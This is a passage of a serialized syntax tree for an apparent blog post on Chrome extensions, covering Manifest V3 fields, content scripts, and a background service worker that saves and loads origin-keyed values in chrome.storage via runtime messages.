type":38,"value":669},{"type":33,"tag":128,"props":12685,"children":12686},{"style":312},[12687],{"type":38,"value":284},{"type":33,"tag":128,"props":12689,"children":12690},{"style":312},[12691],{"type":38,"value":1466},{"type":33,"tag":128,"props":12693,"children":12694},{"class":130,"line":1177},[12695],{"type":33,"tag":128,"props":12696,"children":12697},{"style":312},[12698],{"type":38,"value":12699},"    {\n",{"type":33,"tag":128,"props":12701,"children":12702},{"class":130,"line":1189},[12703,12708,12713,12717,12721],{"type":33,"tag":128,"props":12704,"children":12705},{"style":656},[12706],{"type":38,"value":12707},"      
\"",{"type":33,"tag":128,"props":12709,"children":12710},{"style":437},[12711],{"type":38,"value":12712},"matches",{"type":33,"tag":128,"props":12714,"children":12715},{"style":656},[12716],{"type":38,"value":669},{"type":33,"tag":128,"props":12718,"children":12719},{"style":312},[12720],{"type":38,"value":284},{"type":33,"tag":128,"props":12722,"children":12723},{"style":312},[12724],{"type":38,"value":1466},{"type":33,"tag":128,"props":12726,"children":12727},{"class":130,"line":1202},[12728,12733,12738],{"type":33,"tag":128,"props":12729,"children":12730},{"style":676},[12731],{"type":38,"value":12732},"        \"",{"type":33,"tag":128,"props":12734,"children":12735},{"style":140},[12736],{"type":38,"value":12737},"\u003Call_urls>",{"type":33,"tag":128,"props":12739,"children":12740},{"style":676},[12741],{"type":38,"value":836},{"type":33,"tag":128,"props":12743,"children":12744},{"class":130,"line":1214},[12745],{"type":33,"tag":128,"props":12746,"children":12747},{"style":312},[12748],{"type":38,"value":12749},"      
],\n",{"type":33,"tag":128,"props":12751,"children":12752},{"class":130,"line":1226},[12753,12757,12762,12766,12770,12774,12779,12783],{"type":33,"tag":128,"props":12754,"children":12755},{"style":656},[12756],{"type":38,"value":12707},{"type":33,"tag":128,"props":12758,"children":12759},{"style":437},[12760],{"type":38,"value":12761},"run_at",{"type":33,"tag":128,"props":12763,"children":12764},{"style":656},[12765],{"type":38,"value":669},{"type":33,"tag":128,"props":12767,"children":12768},{"style":312},[12769],{"type":38,"value":284},{"type":33,"tag":128,"props":12771,"children":12772},{"style":676},[12773],{"type":38,"value":679},{"type":33,"tag":128,"props":12775,"children":12776},{"style":140},[12777],{"type":38,"value":12778},"document_idle",{"type":33,"tag":128,"props":12780,"children":12781},{"style":676},[12782],{"type":38,"value":669},{"type":33,"tag":128,"props":12784,"children":12785},{"style":312},[12786],{"type":38,"value":693},{"type":33,"tag":128,"props":12788,"children":12789},{"class":130,"line":1239},[12790,12794,12798,12802,12806],{"type":33,"tag":128,"props":12791,"children":12792},{"style":656},[12793],{"type":38,"value":12707},{"type":33,"tag":128,"props":12795,"children":12796},{"style":437},[12797],{"type":38,"value":5526},{"type":33,"tag":128,"props":12799,"children":12800},{"style":656},[12801],{"type":38,"value":669},{"type":33,"tag":128,"props":12803,"children":12804},{"style":312},[12805],{"type":38,"value":284},{"type":33,"tag":128,"props":12807,"children":12808},{"style":312},[12809],{"type":38,"value":1466},{"type":33,"tag":128,"props":12811,"children":12812},{"class":130,"line":1251},[12813,12817,12822],{"type":33,"tag":128,"props":12814,"children":12815},{"style":676},[12816],{"type":38,"value":12732},{"type":33,"tag":128,"props":12818,"children":12819},{"style":140},[12820],{"type":38,"value":12821},"contentScript.js",{"type":33,"tag":128,"props":12823,"children":12824},{"style":676},[12825],{"type":38,"value":836},{"type":33,"t
ag":128,"props":12827,"children":12828},{"class":130,"line":1263},[12829],{"type":33,"tag":128,"props":12830,"children":12831},{"style":312},[12832],{"type":38,"value":12833},"      ]\n",{"type":33,"tag":128,"props":12835,"children":12836},{"class":130,"line":1276},[12837],{"type":33,"tag":128,"props":12838,"children":12839},{"style":312},[12840],{"type":38,"value":6760},{"type":33,"tag":128,"props":12842,"children":12843},{"class":130,"line":1288},[12844],{"type":33,"tag":128,"props":12845,"children":12846},{"style":312},[12847],{"type":38,"value":1546},{"type":33,"tag":128,"props":12849,"children":12850},{"class":130,"line":1300},[12851],{"type":33,"tag":128,"props":12852,"children":12853},{"style":312},[12854],{"type":38,"value":854},{"type":33,"tag":239,"props":12856,"children":12857},{},[12858,12868,12878,12888],{"type":33,"tag":243,"props":12859,"children":12860},{},[12861,12866],{"type":33,"tag":105,"props":12862,"children":12864},{"className":12863},[],[12865],{"type":38,"value":12449},{"type":38,"value":12867},": Runs in the background and can listen to events (like network requests, tab creation, etc.).",{"type":33,"tag":243,"props":12869,"children":12870},{},[12871,12876],{"type":33,"tag":105,"props":12872,"children":12874},{"className":12873},[],[12875],{"type":38,"value":12513},{"type":38,"value":12877},": Configures the action for the extension's toolbar icon, which users can click on.",{"type":33,"tag":243,"props":12879,"children":12880},{},[12881,12886],{"type":33,"tag":105,"props":12882,"children":12884},{"className":12883},[],[12885],{"type":38,"value":1453},{"type":38,"value":12887},": Lists the permissions that the extension needs to function properly. 
These permissions are essential as they allow the extension to access certain browser features.",{"type":33,"tag":243,"props":12889,"children":12890},{},[12891,12896],{"type":33,"tag":105,"props":12892,"children":12894},{"className":12893},[],[12895],{"type":38,"value":12679},{"type":38,"value":12897},": Scripts that run in the context of specific web pages and interact with the page’s DOM.",{"type":33,"tag":88,"props":12899,"children":12901},{"id":12900},"content-scripts",[12902],{"type":38,"value":12903},"Content Scripts",{"type":33,"tag":47,"props":12905,"children":12906},{},[12907],{"type":38,"value":12908},"These are JavaScript files that run on specified pages. These files run in the context of web pages and allow Chrome extensions to interact with a page's DOM. They enable developers to access and modify the content of web pages directly, creating a bridge between the extension and the page the user is visiting.",{"type":33,"tag":88,"props":12910,"children":12912},{"id":12911},"background-service-worker",[12913],{"type":38,"value":12914},"Background Service Worker",{"type":33,"tag":47,"props":12916,"children":12917},{},[12918],{"type":38,"value":12919},"In Chrome extensions that use Manifest Version 3 (MV3), the background service worker replaces the traditional background script. This service worker is a JavaScript file that runs in the background of the browser, managing tasks that don’t require direct user interaction, such as handling events, managing persistent data, and listening for API calls.",{"type":33,"tag":47,"props":12921,"children":12922},{},[12923],{"type":38,"value":12924},"Most of the time, the background script will listen for events and process them to perform actions in the background. 
In our case, we can see that events are handled and processed to cache information.",{"type":33,"tag":114,"props":12926,"children":12927},{"lang":5526},[12928],{"type":33,"tag":119,"props":12929,"children":12931},{"className":5530,"code":12930,"language":5526,"meta":8,"style":8},"'use strict';\n\n// With background scripts you can communicate with popup\n// and contentScript files.\n// For more information on background script,\n// See https://developer.chrome.com/extensions/background_pages\n\nfunction save(key, value, origin) {\n  return new Promise((resolve, reject) => {\n    key = key + \"-\" + origin;\n    console.log(\"Saving: \", key, value);\n    chrome.storage.local.set({ [key]: value }, () => {\n      resolve({ message: 'Data saved successfully' })\n    })\n  })\n}\nfunction load(key, origin) {\n  return new Promise((resolve, reject) => {\n    key = key + \"-\" + origin;\n    console.log(\"Loading: \", key);\n    chrome.storage.local.get([key], data => {\n      if (data.hasOwnProperty(key) === false) {\n        return reject({ message: 'Data not found' });\n      }\n      console.log(\"Data: \", data[key]);\n      resolve(data[key]);\n    });\n  });\n}\n\nchrome.runtime.onMessage.addListener((request, sender, sendResponse) => {\n  new Promise(async () => {\n    const sender_origin = new URL(sender.tab.pendingUrl ?? 
sender.tab.url).origin;\n    console.log(\"Sender Origin: \", sender_origin);\n    console.log(\"Request: \", request);\n    if (request.type === \"SAVE\") {\n      save(request.payload.key, request.payload.value, sender_origin)\n        .then(response => sendResponse(response))\n        .catch(error => sendResponse({ error }));\n    } else if (request.type === \"LOAD\") {\n      load(request.payload.key, sender_origin)\n        .then(response => sendResponse(response))\n        .catch(error => sendResponse({ error }));\n    }\n  })\n  return true;\n});\n\n",[12932],{"type":33,"tag":105,"props":12933,"children":12934},{"__ignoreMap":8},[12935,12955,12962,12970,12978,12986,12994,13001,13049,13098,13142,13195,13268,13306,13314,13322,13329,13365,13408,13451,13495,13554,13608,13649,13657,13711,13738,13746,13754,13761,13768,13842,13875,13966,14010,14055,14104,14173,14215,14257,14316,14360,14399,14438,14445,14452,14467],{"type":33,"tag":128,"props":12936,"children":12937},{"class":130,"line":131},[12938,12942,12947,12951],{"type":33,"tag":128,"props":12939,"children":12940},{"style":676},[12941],{"type":38,"value":6040},{"type":33,"tag":128,"props":12943,"children":12944},{"style":140},[12945],{"type":38,"value":12946},"use strict",{"type":33,"tag":128,"props":12948,"children":12949},{"style":676},[12950],{"type":38,"value":6040},{"type":33,"tag":128,"props":12952,"children":12953},{"style":312},[12954],{"type":38,"value":5676},{"type":33,"tag":128,"props":12956,"children":12957},{"class":130,"line":362},[12958],{"type":33,"tag":128,"props":12959,"children":12960},{"emptyLinePlaceholder":896},[12961],{"type":38,"value":899},{"type":33,"tag":128,"props":12963,"children":12964},{"class":130,"line":403},[12965],{"type":33,"tag":128,"props":12966,"children":12967},{"style":5541},[12968],{"type":38,"value":12969},"// With background scripts you can communicate with 
popup\n",{"type":33,"tag":128,"props":12971,"children":12972},{"class":130,"line":739},[12973],{"type":33,"tag":128,"props":12974,"children":12975},{"style":5541},[12976],{"type":38,"value":12977},"// and contentScript files.\n",{"type":33,"tag":128,"props":12979,"children":12980},{"class":130,"line":765},[12981],{"type":33,"tag":128,"props":12982,"children":12983},{"style":5541},[12984],{"type":38,"value":12985},"// For more information on background script,\n",{"type":33,"tag":128,"props":12987,"children":12988},{"class":130,"line":804},[12989],{"type":33,"tag":128,"props":12990,"children":12991},{"style":5541},[12992],{"type":38,"value":12993},"// See https://developer.chrome.com/extensions/background_pages\n",{"type":33,"tag":128,"props":12995,"children":12996},{"class":130,"line":839},[12997],{"type":33,"tag":128,"props":12998,"children":12999},{"emptyLinePlaceholder":896},[13000],{"type":38,"value":899},{"type":33,"tag":128,"props":13002,"children":13003},{"class":130,"line":848},[13004,13009,13014,13018,13023,13027,13032,13036,13041,13045],{"type":33,"tag":128,"props":13005,"children":13006},{"style":300},[13007],{"type":38,"value":13008},"function",{"type":33,"tag":128,"props":13010,"children":13011},{"style":135},[13012],{"type":38,"value":13013}," save",{"type":33,"tag":128,"props":13015,"children":13016},{"style":312},[13017],{"type":38,"value":5566},{"type":33,"tag":128,"props":13019,"children":13020},{"style":306},[13021],{"type":38,"value":13022},"key",{"type":33,"tag":128,"props":13024,"children":13025},{"style":312},[13026],{"type":38,"value":5584},{"type":33,"tag":128,"props":13028,"children":13029},{"style":306},[13030],{"type":38,"value":13031}," value",{"type":33,"tag":128,"props":13033,"children":13034},{"style":312},[13035],{"type":38,"value":5584},{"type":33,"tag":128,"props":13037,"children":13038},{"style":306},[13039],{"type":38,"value":13040}," 
origin",{"type":33,"tag":128,"props":13042,"children":13043},{"style":312},[13044],{"type":38,"value":2966},{"type":33,"tag":128,"props":13046,"children":13047},{"style":312},[13048],{"type":38,"value":762},{"type":33,"tag":128,"props":13050,"children":13051},{"class":130,"line":976},[13052,13057,13062,13067,13072,13077,13081,13086,13090,13094],{"type":33,"tag":128,"props":13053,"children":13054},{"style":1576},[13055],{"type":38,"value":13056},"  return",{"type":33,"tag":128,"props":13058,"children":13059},{"style":300},[13060],{"type":38,"value":13061}," new",{"type":33,"tag":128,"props":13063,"children":13064},{"style":437},[13065],{"type":38,"value":13066}," Promise",{"type":33,"tag":128,"props":13068,"children":13069},{"style":312},[13070],{"type":38,"value":13071},"((",{"type":33,"tag":128,"props":13073,"children":13074},{"style":306},[13075],{"type":38,"value":13076},"resolve",{"type":33,"tag":128,"props":13078,"children":13079},{"style":312},[13080],{"type":38,"value":5584},{"type":33,"tag":128,"props":13082,"children":13083},{"style":306},[13084],{"type":38,"value":13085}," reject",{"type":33,"tag":128,"props":13087,"children":13088},{"style":312},[13089],{"type":38,"value":2966},{"type":33,"tag":128,"props":13091,"children":13092},{"style":312},[13093],{"type":38,"value":5625},{"type":33,"tag":128,"props":13095,"children":13096},{"style":312},[13097],{"type":38,"value":762},{"type":33,"tag":128,"props":13099,"children":13100},{"class":130,"line":988},[13101,13106,13110,13114,13118,13122,13126,13130,13134,13138],{"type":33,"tag":128,"props":13102,"children":13103},{"style":306},[13104],{"type":38,"value":13105},"    
key",{"type":33,"tag":128,"props":13107,"children":13108},{"style":312},[13109],{"type":38,"value":5657},{"type":33,"tag":128,"props":13111,"children":13112},{"style":306},[13113],{"type":38,"value":5027},{"type":33,"tag":128,"props":13115,"children":13116},{"style":300},[13117],{"type":38,"value":8297},{"type":33,"tag":128,"props":13119,"children":13120},{"style":676},[13121],{"type":38,"value":679},{"type":33,"tag":128,"props":13123,"children":13124},{"style":140},[13125],{"type":38,"value":907},{"type":33,"tag":128,"props":13127,"children":13128},{"style":676},[13129],{"type":38,"value":669},{"type":33,"tag":128,"props":13131,"children":13132},{"style":300},[13133],{"type":38,"value":8297},{"type":33,"tag":128,"props":13135,"children":13136},{"style":306},[13137],{"type":38,"value":13040},{"type":33,"tag":128,"props":13139,"children":13140},{"style":312},[13141],{"type":38,"value":5676},{"type":33,"tag":128,"props":13143,"children":13144},{"class":130,"line":1001},[13145,13149,13153,13158,13162,13166,13171,13175,13179,13183,13187,13191],{"type":33,"tag":128,"props":13146,"children":13147},{"style":306},[13148],{"type":38,"value":6880},{"type":33,"tag":128,"props":13150,"children":13151},{"style":312},[13152],{"type":38,"value":215},{"type":33,"tag":128,"props":13154,"children":13155},{"style":135},[13156],{"type":38,"value":13157},"log",{"type":33,"tag":128,"props":13159,"children":13160},{"style":312},[13161],{"type":38,"value":5566},{"type":33,"tag":128,"props":13163,"children":13164},{"style":676},[13165],{"type":38,"value":669},{"type":33,"tag":128,"props":13167,"children":13168},{"style":140},[13169],{"type":38,"value":13170},"Saving: 
",{"type":33,"tag":128,"props":13172,"children":13173},{"style":676},[13174],{"type":38,"value":669},{"type":33,"tag":128,"props":13176,"children":13177},{"style":312},[13178],{"type":38,"value":5584},{"type":33,"tag":128,"props":13180,"children":13181},{"style":306},[13182],{"type":38,"value":5027},{"type":33,"tag":128,"props":13184,"children":13185},{"style":312},[13186],{"type":38,"value":5584},{"type":33,"tag":128,"props":13188,"children":13189},{"style":306},[13190],{"type":38,"value":13031},{"type":33,"tag":128,"props":13192,"children":13193},{"style":312},[13194],{"type":38,"value":5815},{"type":33,"tag":128,"props":13196,"children":13197},{"class":130,"line":1014},[13198,13203,13207,13211,13215,13220,13224,13229,13233,13237,13241,13246,13250,13255,13260,13264],{"type":33,"tag":128,"props":13199,"children":13200},{"style":306},[13201],{"type":38,"value":13202},"    chrome",{"type":33,"tag":128,"props":13204,"children":13205},{"style":312},[13206],{"type":38,"value":215},{"type":33,"tag":128,"props":13208,"children":13209},{"style":306},[13210],{"type":38,"value":12636},{"type":33,"tag":128,"props":13212,"children":13213},{"style":312},[13214],{"type":38,"value":215},{"type":33,"tag":128,"props":13216,"children":13217},{"style":306},[13218],{"type":38,"value":13219},"local",{"type":33,"tag":128,"props":13221,"children":13222},{"style":312},[13223],{"type":38,"value":215},{"type":33,"tag":128,"props":13225,"children":13226},{"style":135},[13227],{"type":38,"value":13228},"set",{"type":33,"tag":128,"props":13230,"children":13231},{"style":312},[13232],{"type":38,"value":5836},{"type":33,"tag":128,"props":13234,"children":13235},{"style":312},[13236],{"type":38,"value":718},{"type":33,"tag":128,"props":13238,"children":13239},{"style":306},[13240],{"type":38,"value":13022},{"type":33,"tag":128,"props":13242,"children":13243},{"style":312},[13244],{"type":38,"value":13245},"]:",{"type":33,"tag":128,"props":13247,"children":13248},{"style":306},[13249],{"type":38,"
value":13031},{"type":33,"tag":128,"props":13251,"children":13252},{"style":312},[13253],{"type":38,"value":13254}," },",{"type":33,"tag":128,"props":13256,"children":13257},{"style":312},[13258],{"type":38,"value":13259}," ()",{"type":33,"tag":128,"props":13261,"children":13262},{"style":312},[13263],{"type":38,"value":5625},{"type":33,"tag":128,"props":13265,"children":13266},{"style":312},[13267],{"type":38,"value":762},{"type":33,"tag":128,"props":13269,"children":13270},{"class":130,"line":1026},[13271,13276,13280,13284,13288,13292,13297,13301],{"type":33,"tag":128,"props":13272,"children":13273},{"style":135},[13274],{"type":38,"value":13275},"      resolve",{"type":33,"tag":128,"props":13277,"children":13278},{"style":312},[13279],{"type":38,"value":5836},{"type":33,"tag":128,"props":13281,"children":13282},{"style":437},[13283],{"type":38,"value":6730},{"type":33,"tag":128,"props":13285,"children":13286},{"style":312},[13287],{"type":38,"value":284},{"type":33,"tag":128,"props":13289,"children":13290},{"style":676},[13291],{"type":38,"value":6739},{"type":33,"tag":128,"props":13293,"children":13294},{"style":140},[13295],{"type":38,"value":13296},"Data saved successfully",{"type":33,"tag":128,"props":13298,"children":13299},{"style":676},[13300],{"type":38,"value":6040},{"type":33,"tag":128,"props":13302,"children":13303},{"style":312},[13304],{"type":38,"value":13305}," })\n",{"type":33,"tag":128,"props":13307,"children":13308},{"class":130,"line":1038},[13309],{"type":33,"tag":128,"props":13310,"children":13311},{"style":312},[13312],{"type":38,"value":13313},"    })\n",{"type":33,"tag":128,"props":13315,"children":13316},{"class":130,"line":1051},[13317],{"type":33,"tag":128,"props":13318,"children":13319},{"style":312},[13320],{"type":38,"value":13321},"  
})\n",{"type":33,"tag":128,"props":13323,"children":13324},{"class":130,"line":1063},[13325],{"type":33,"tag":128,"props":13326,"children":13327},{"style":312},[13328],{"type":38,"value":854},{"type":33,"tag":128,"props":13330,"children":13331},{"class":130,"line":1076},[13332,13336,13341,13345,13349,13353,13357,13361],{"type":33,"tag":128,"props":13333,"children":13334},{"style":300},[13335],{"type":38,"value":13008},{"type":33,"tag":128,"props":13337,"children":13338},{"style":135},[13339],{"type":38,"value":13340}," load",{"type":33,"tag":128,"props":13342,"children":13343},{"style":312},[13344],{"type":38,"value":5566},{"type":33,"tag":128,"props":13346,"children":13347},{"style":306},[13348],{"type":38,"value":13022},{"type":33,"tag":128,"props":13350,"children":13351},{"style":312},[13352],{"type":38,"value":5584},{"type":33,"tag":128,"props":13354,"children":13355},{"style":306},[13356],{"type":38,"value":13040},{"type":33,"tag":128,"props":13358,"children":13359},{"style":312},[13360],{"type":38,"value":2966},{"type":33,"tag":128,"props":13362,"children":13363},{"style":312},[13364],{"type":38,"value":762},{"type":33,"tag":128,"props":13366,"children":13367},{"class":130,"line":1089},[13368,13372,13376,13380,13384,13388,13392,13396,13400,13404],{"type":33,"tag":128,"props":13369,"children":13370},{"style":1576},[13371],{"type":38,"value":13056},{"type":33,"tag":128,"props":13373,"children":13374},{"style":300},[13375],{"type":38,"value":13061},{"type":33,"tag":128,"props":13377,"children":13378},{"style":437},[13379],{"type":38,"value":13066},{"type":33,"tag":128,"props":13381,"children":13382},{"style":312},[13383],{"type":38,"value":13071},{"type":33,"tag":128,"props":13385,"children":13386},{"style":306},[13387],{"type":38,"value":13076},{"type":33,"tag":128,"props":13389,"children":13390},{"style":312},[13391],{"type":38,"value":5584},{"type":33,"tag":128,"props":13393,"children":13394},{"style":306},[13395],{"type":38,"value":13085},{"type":33,"tag":128
,"props":13397,"children":13398},{"style":312},[13399],{"type":38,"value":2966},{"type":33,"tag":128,"props":13401,"children":13402},{"style":312},[13403],{"type":38,"value":5625},{"type":33,"tag":128,"props":13405,"children":13406},{"style":312},[13407],{"type":38,"value":762},{"type":33,"tag":128,"props":13409,"children":13410},{"class":130,"line":1101},[13411,13415,13419,13423,13427,13431,13435,13439,13443,13447],{"type":33,"tag":128,"props":13412,"children":13413},{"style":306},[13414],{"type":38,"value":13105},{"type":33,"tag":128,"props":13416,"children":13417},{"style":312},[13418],{"type":38,"value":5657},{"type":33,"tag":128,"props":13420,"children":13421},{"style":306},[13422],{"type":38,"value":5027},{"type":33,"tag":128,"props":13424,"children":13425},{"style":300},[13426],{"type":38,"value":8297},{"type":33,"tag":128,"props":13428,"children":13429},{"style":676},[13430],{"type":38,"value":679},{"type":33,"tag":128,"props":13432,"children":13433},{"style":140},[13434],{"type":38,"value":907},{"type":33,"tag":128,"props":13436,"children":13437},{"style":676},[13438],{"type":38,"value":669},{"type":33,"tag":128,"props":13440,"children":13441},{"style":300},[13442],{"type":38,"value":8297},{"type":33,"tag":128,"props":13444,"children":13445},{"style":306},[13446],{"type":38,"value":13040},{"type":33,"tag":128,"props":13448,"children":13449},{"style":312},[13450],{"type":38,"value":5676},{"type":33,"tag":128,"props":13452,"children":13453},{"class":130,"line":1114},[13454,13458,13462,13466,13470,13474,13479,13483,13487,13491],{"type":33,"tag":128,"props":13455,"children":13456},{"style":306},[13457],{"type":38,"value":6880},{"type":33,"tag":128,"props":13459,"children":13460},{"style":312},[13461],{"type":38,"value":215},{"type":33,"tag":128,"props":13463,"children":13464},{"style":135},[13465],{"type":38,"value":13157},{"type":33,"tag":128,"props":13467,"children":13468},{"style":312},[13469],{"type":38,"value":5566},{"type":33,"tag":128,"props":13471,"chil
dren":13472},{"style":676},[13473],{"type":38,"value":669},{"type":33,"tag":128,"props":13475,"children":13476},{"style":140},[13477],{"type":38,"value":13478},"Loading: ",{"type":33,"tag":128,"props":13480,"children":13481},{"style":676},[13482],{"type":38,"value":669},{"type":33,"tag":128,"props":13484,"children":13485},{"style":312},[13486],{"type":38,"value":5584},{"type":33,"tag":128,"props":13488,"children":13489},{"style":306},[13490],{"type":38,"value":5027},{"type":33,"tag":128,"props":13492,"children":13493},{"style":312},[13494],{"type":38,"value":5815},{"type":33,"tag":128,"props":13496,"children":13497},{"class":130,"line":1127},[13498,13502,13506,13510,13514,13518,13522,13527,13532,13536,13541,13546,13550],{"type":33,"tag":128,"props":13499,"children":13500},{"style":306},[13501],{"type":38,"value":13202},{"type":33,"tag":128,"props":13503,"children":13504},{"style":312},[13505],{"type":38,"value":215},{"type":33,"tag":128,"props":13507,"children":13508},{"style":306},[13509],{"type":38,"value":12636},{"type":33,"tag":128,"props":13511,"children":13512},{"style":312},[13513],{"type":38,"value":215},{"type":33,"tag":128,"props":13515,"children":13516},{"style":306},[13517],{"type":38,"value":13219},{"type":33,"tag":128,"props":13519,"children":13520},{"style":312},[13521],{"type":38,"value":215},{"type":33,"tag":128,"props":13523,"children":13524},{"style":135},[13525],{"type":38,"value":13526},"get",{"type":33,"tag":128,"props":13528,"children":13529},{"style":312},[13530],{"type":38,"value":13531},"([",{"type":33,"tag":128,"props":13533,"children":13534},{"style":306},[13535],{"type":38,"value":13022},{"type":33,"tag":128,"props":13537,"children":13538},{"style":312},[13539],{"type":38,"value":13540},"],",{"type":33,"tag":128,"props":13542,"children":13543},{"style":306},[13544],{"type":38,"value":13545}," 
data",{"type":33,"tag":128,"props":13547,"children":13548},{"style":312},[13549],{"type":38,"value":5625},{"type":33,"tag":128,"props":13551,"children":13552},{"style":312},[13553],{"type":38,"value":762},{"type":33,"tag":128,"props":13555,"children":13556},{"class":130,"line":1139},[13557,13562,13566,13570,13574,13579,13583,13587,13591,13596,13600,13604],{"type":33,"tag":128,"props":13558,"children":13559},{"style":1576},[13560],{"type":38,"value":13561},"      if",{"type":33,"tag":128,"props":13563,"children":13564},{"style":312},[13565],{"type":38,"value":2852},{"type":33,"tag":128,"props":13567,"children":13568},{"style":306},[13569],{"type":38,"value":2815},{"type":33,"tag":128,"props":13571,"children":13572},{"style":312},[13573],{"type":38,"value":215},{"type":33,"tag":128,"props":13575,"children":13576},{"style":135},[13577],{"type":38,"value":13578},"hasOwnProperty",{"type":33,"tag":128,"props":13580,"children":13581},{"style":312},[13582],{"type":38,"value":5566},{"type":33,"tag":128,"props":13584,"children":13585},{"style":306},[13586],{"type":38,"value":13022},{"type":33,"tag":128,"props":13588,"children":13589},{"style":312},[13590],{"type":38,"value":2966},{"type":33,"tag":128,"props":13592,"children":13593},{"style":300},[13594],{"type":38,"value":13595}," ===",{"type":33,"tag":128,"props":13597,"children":13598},{"style":1576},[13599],{"type":38,"value":6721},{"type":33,"tag":128,"props":13601,"children":13602},{"style":312},[13603],{"type":38,"value":2966},{"type":33,"tag":128,"props":13605,"children":13606},{"style":312},[13607],{"type":38,"value":762},{"type":33,"tag":128,"props":13609,"children":13610},{"class":130,"line":1152},[13611,13616,13620,13624,13628,13632,13636,13641,13645],{"type":33,"tag":128,"props":13612,"children":13613},{"style":1576},[13614],{"type":38,"value":13615},"        
return",{"type":33,"tag":128,"props":13617,"children":13618},{"style":135},[13619],{"type":38,"value":13085},{"type":33,"tag":128,"props":13621,"children":13622},{"style":312},[13623],{"type":38,"value":5836},{"type":33,"tag":128,"props":13625,"children":13626},{"style":437},[13627],{"type":38,"value":6730},{"type":33,"tag":128,"props":13629,"children":13630},{"style":312},[13631],{"type":38,"value":284},{"type":33,"tag":128,"props":13633,"children":13634},{"style":676},[13635],{"type":38,"value":6739},{"type":33,"tag":128,"props":13637,"children":13638},{"style":140},[13639],{"type":38,"value":13640},"Data not found",{"type":33,"tag":128,"props":13642,"children":13643},{"style":676},[13644],{"type":38,"value":6040},{"type":33,"tag":128,"props":13646,"children":13647},{"style":312},[13648],{"type":38,"value":5863},{"type":33,"tag":128,"props":13650,"children":13651},{"class":130,"line":1165},[13652],{"type":33,"tag":128,"props":13653,"children":13654},{"style":312},[13655],{"type":38,"value":13656},"      }\n",{"type":33,"tag":128,"props":13658,"children":13659},{"class":130,"line":1177},[13660,13665,13669,13673,13677,13681,13686,13690,13694,13698,13702,13706],{"type":33,"tag":128,"props":13661,"children":13662},{"style":306},[13663],{"type":38,"value":13664},"      console",{"type":33,"tag":128,"props":13666,"children":13667},{"style":312},[13668],{"type":38,"value":215},{"type":33,"tag":128,"props":13670,"children":13671},{"style":135},[13672],{"type":38,"value":13157},{"type":33,"tag":128,"props":13674,"children":13675},{"style":312},[13676],{"type":38,"value":5566},{"type":33,"tag":128,"props":13678,"children":13679},{"style":676},[13680],{"type":38,"value":669},{"type":33,"tag":128,"props":13682,"children":13683},{"style":140},[13684],{"type":38,"value":13685},"Data: 
",{"type":33,"tag":128,"props":13687,"children":13688},{"style":676},[13689],{"type":38,"value":669},{"type":33,"tag":128,"props":13691,"children":13692},{"style":312},[13693],{"type":38,"value":5584},{"type":33,"tag":128,"props":13695,"children":13696},{"style":306},[13697],{"type":38,"value":13545},{"type":33,"tag":128,"props":13699,"children":13700},{"style":312},[13701],{"type":38,"value":344},{"type":33,"tag":128,"props":13703,"children":13704},{"style":306},[13705],{"type":38,"value":13022},{"type":33,"tag":128,"props":13707,"children":13708},{"style":312},[13709],{"type":38,"value":13710},"]);\n",{"type":33,"tag":128,"props":13712,"children":13713},{"class":130,"line":1189},[13714,13718,13722,13726,13730,13734],{"type":33,"tag":128,"props":13715,"children":13716},{"style":135},[13717],{"type":38,"value":13275},{"type":33,"tag":128,"props":13719,"children":13720},{"style":312},[13721],{"type":38,"value":5566},{"type":33,"tag":128,"props":13723,"children":13724},{"style":306},[13725],{"type":38,"value":2815},{"type":33,"tag":128,"props":13727,"children":13728},{"style":312},[13729],{"type":38,"value":344},{"type":33,"tag":128,"props":13731,"children":13732},{"style":306},[13733],{"type":38,"value":13022},{"type":33,"tag":128,"props":13735,"children":13736},{"style":312},[13737],{"type":38,"value":13710},{"type":33,"tag":128,"props":13739,"children":13740},{"class":130,"line":1202},[13741],{"type":33,"tag":128,"props":13742,"children":13743},{"style":312},[13744],{"type":38,"value":13745},"    });\n",{"type":33,"tag":128,"props":13747,"children":13748},{"class":130,"line":1214},[13749],{"type":33,"tag":128,"props":13750,"children":13751},{"style":312},[13752],{"type":38,"value":13753},"  
});\n",{"type":33,"tag":128,"props":13755,"children":13756},{"class":130,"line":1226},[13757],{"type":33,"tag":128,"props":13758,"children":13759},{"style":312},[13760],{"type":38,"value":854},{"type":33,"tag":128,"props":13762,"children":13763},{"class":130,"line":1239},[13764],{"type":33,"tag":128,"props":13765,"children":13766},{"emptyLinePlaceholder":896},[13767],{"type":38,"value":899},{"type":33,"tag":128,"props":13769,"children":13770},{"class":130,"line":1251},[13771,13776,13780,13785,13789,13794,13798,13803,13807,13812,13816,13821,13825,13830,13834,13838],{"type":33,"tag":128,"props":13772,"children":13773},{"style":306},[13774],{"type":38,"value":13775},"chrome",{"type":33,"tag":128,"props":13777,"children":13778},{"style":312},[13779],{"type":38,"value":215},{"type":33,"tag":128,"props":13781,"children":13782},{"style":306},[13783],{"type":38,"value":13784},"runtime",{"type":33,"tag":128,"props":13786,"children":13787},{"style":312},[13788],{"type":38,"value":215},{"type":33,"tag":128,"props":13790,"children":13791},{"style":306},[13792],{"type":38,"value":13793},"onMessage",{"type":33,"tag":128,"props":13795,"children":13796},{"style":312},[13797],{"type":38,"value":215},{"type":33,"tag":128,"props":13799,"children":13800},{"style":135},[13801],{"type":38,"value":13802},"addListener",{"type":33,"tag":128,"props":13804,"children":13805},{"style":312},[13806],{"type":38,"value":13071},{"type":33,"tag":128,"props":13808,"children":13809},{"style":306},[13810],{"type":38,"value":13811},"request",{"type":33,"tag":128,"props":13813,"children":13814},{"style":312},[13815],{"type":38,"value":5584},{"type":33,"tag":128,"props":13817,"children":13818},{"style":306},[13819],{"type":38,"value":13820}," sender",{"type":33,"tag":128,"props":13822,"children":13823},{"style":312},[13824],{"type":38,"value":5584},{"type":33,"tag":128,"props":13826,"children":13827},{"style":306},[13828],{"type":38,"value":13829}," 
